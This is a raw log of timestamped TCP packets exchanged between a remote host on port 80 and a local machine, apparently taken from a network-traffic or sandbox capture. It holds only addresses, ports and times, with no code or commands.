Sep 27, 2024 01:49:56.292085886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292102098 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292123079 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292139053 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292149067 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292319059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292356014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292380095 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292407036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292433977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292450905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292450905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292464972 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292464972 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292481899 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292498112 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292547941 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292619944 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292670965 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292671919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292721033 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292757034 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292773008 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292793036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292834997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292851925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292870998 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292892933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292910099 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292924881 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292927027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292943954 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292958975 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292965889 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292965889 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292973995 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292990923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293009043 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.293046951 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293061972 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293077946 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293093920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293107986 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293123007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293129921 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.293139935 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293154955 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.293154955 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293174028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293190956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.293200016 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.293421984 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.298716068 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299221992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299238920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299269915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299309015 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299318075 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299334049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299349070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299391985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299401999 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299411058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299451113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299458027 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299468040 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299484015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299499989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299534082 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299534082 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299544096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299578905 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299595118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299611092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299613953 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299627066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299644947 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299659014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299673080 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299673080 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299676895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299716949 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299721956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299738884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299798012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299815893 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299815893 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299823046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299840927 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299855947 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299871922 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299906969 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299922943 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299946070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299962997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.299981117 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.299988031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300014973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300039053 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300051928 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300054073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300065041 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300071955 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300086975 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300101995 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300107002 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300117970 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300132990 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300164938 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300179958 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300198078 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300200939 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300215960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300231934 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300246000 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300247908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300263882 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300266027 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300282001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300297976 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300298929 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300312996 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300328970 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300344944 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300349951 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300349951 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300359964 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300375938 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300391912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300406933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300412893 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300412893 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.300421953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300437927 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.300457001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.301704884 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.380347013 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380368948 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380486965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380539894 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380554914 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380554914 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.380563974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380572081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380594015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380615950 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380631924 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380649090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380665064 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380680084 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380693913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380709887 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.380711079 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.380800009 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384464979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384529114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384555101 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384571075 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384579897 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384598970 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384620905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384634972 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384649992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384675980 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384677887 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384701967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384706020 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384718895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384733915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384751081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384767056 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384778976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384778976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384805918 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384819984 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384836912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384852886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384870052 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384886026 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384895086 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384905100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384929895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.384959936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.384959936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385054111 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385175943 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385196924 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385257959 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385283947 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385308027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385323048 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385338068 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385354042 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385370970 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385370970 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385379076 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385387897 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385412931 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385426998 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385442972 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385457993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385473013 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385476112 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385499954 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385500908 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385500908 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385515928 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385531902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385546923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385549068 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385564089 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385579109 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385595083 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385611057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.385660887 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385660887 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.385660887 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.386074066 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.391496897 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391513109 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391613007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391630888 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.391632080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391681910 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391711950 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391737938 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391761065 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391776085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391788960 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.391788960 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.391792059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391808987 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391823053 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391829014 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.391839981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391856909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.391879082 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.391879082 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392061949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392102957 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392118931 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392152071 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392153978 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392174959 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392190933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392221928 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392245054 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392245054 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392245054 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392261028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392298937 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392317057 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392314911 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392350912 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392350912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392366886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392384052 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392399073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392416000 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392446995 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392446995 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392455101 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392469883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392492056 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392502069 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392529011 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392544985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392560959 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392576933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392591953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392600060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392606974 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392607927 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392627001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392664909 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392664909 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392664909 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392664909 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392668962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392684937 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392699003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392714977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392724037 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392730951 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392746925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392761946 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392764091 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392776966 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392781019 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392796040 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392812014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392827034 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392843008 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392854929 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392854929 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392858982 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392874002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392889023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.392910957 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.392910957 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.393102884 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.473038912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473083019 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473109961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473133087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473146915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473161936 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473177910 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473196030 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.473223925 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.473223925 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.473227978 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473253965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473269939 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473284960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473299980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473309994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.473316908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473340988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.473403931 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.473403931 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.474881887 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.476820946 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.476907969 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.476922989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477010965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477040052 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477098942 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477113962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477128983 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477144957 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477153063 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477153063 CEST	49743	80	192.168.2.8	147.45.44.104
